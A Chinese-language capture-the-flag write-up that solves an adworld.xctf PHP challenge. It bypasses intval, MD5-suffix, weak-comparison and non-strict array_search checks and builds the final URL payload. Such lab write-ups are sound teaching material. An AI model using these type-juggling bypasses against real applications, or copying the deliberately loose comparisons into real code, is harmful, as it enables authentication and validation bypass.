题目来源:

题目来源

https://adworld.xctf.org.cn/

题目概览

一进来引入眼帘的就是一段PHP。

<?phphighlight_file(__FILE__);$key1 = 0;$key2 = 0;$a = $_GET['a'];$b = $_GET['b'];if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){        $key1 = 1;        }else{            die("Emmm...再想想");        }    }else{    die("Emmm...");}$c=(array)json_decode(@$_GET['c']);if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){        $d = array_search("DGGJ", $c["n"]);        $d === false?die("no..."):NULL;        foreach($c["n"] as $key=>$val){            $val==="DGGJ"?die("no......"):NULL;        }        $key2 = 1;    }else{        die("no hack");    }}else{    die("no");}if($key1 && $key2){    include "Hgfks.php";    echo "You're right"."n";}?>

分析一下代码吧。GET传三个参数a、b、c,满足一系列条件让key1=1 &&

参数a

a只有这一小段戏码。intval(a)将a转化成整数然后要满足大于6000000同时长度小于等于3。怎么办?可以想到使用科学计数法。

所以a=6e7。

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)

参数b

if(isset($b) && '8b184b' === substr(md5($b),-6,6))

这段代码截取$b经过md5加密后的最后六位字符,需要满足=== '8b184b'。所以要找一个数字或字符串,经过md5加密后最后六位为8b184b。

跑个代码就得到了,得到结果为53724。

import hashlibfor i in range(0, 100000):    hl=hashlib.md5()    s = str(i)    hl.update(s.encode(encoding='utf8'))    md5=hl.hexdigest()    if str(md5)[-6:] == "8b184b":        print(s + ":" +  str(md5))        break

所以b=53724。

a和b解决之后就可以让$key1=1了。

参数c

这一个参数应该是最难的,反正我是搞了很久。

$c=(array)json_decode(@$_GET['c']);if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){        $d = array_search("DGGJ", $c["n"]);        $d === false?die("no..."):NULL;        foreach($c["n"] as $key=>$val){            $val==="DGGJ"?die("no......"):NULL;        }        $key2 = 1;    }else{        die("no hack");    }}else{    die("no");}

第一行可知,传入的c应该是一个JSON格式的字符串,然后解析成数组。

首先判断@c["m"]是否为数字,如果是就寄了。还需要满足

if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022)

又是弱类型比较,第一部分这样就可以了。

{    "m":"2023a",}

@c["n"]为含两个元素的数组,且

if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0]))

所以继续补充如下。

{    "m":"2023a",    "n": [        [1, 2, 3],        [4, 5, 6]    ]}

最后一部分了。

$d = array_search("DGGJ", $c["n"]);        $d === false?die("no..."):NULL;        foreach($c["n"] as $key=>$val){            $val==="DGGJ"?die("no......"):NULL;        }

d = array_search("DGGJ", d = = = false?die("no..."):NULL;这两句,在数组

{    "m":"2023a",    "n": [        [1, 2, 3],        "DGGJ"    ]}

这段代码遍历$c["n"]数组中的值,如果出现了DGGJ则退出进程。得想点办法绕过去。

foreach($c["n"] as $key=>$val){$val==="DGGJ"?die("no......"):NULL;}

还是回到array_search()这个函数,把c中的DGGJ换成0即可。

这里的array_search()没有设置strict参数(如果该参数被设置为 TRUE,则函数在数组中搜索数据类型和值都一致的元素),我们就可以用0和DGGJ进行弱比较,0 == 'DGGJ'。

这样最后的c就整出来了。

{    "m":"2023a",    "n": [        [1, 2, 3],        0    ]}

拿下flag

所以最后payload为:

?a=6e7&b=53724&c={"m":"2023a","n":[[1,2,3],0]}#url编码?a=6e7&b=53724&c=%7B%22m%22%3A%222023a%22%2C%22n%22%3A%5B%5B1%2C2%2C3%5D%2C0%5D%7D

拿下flag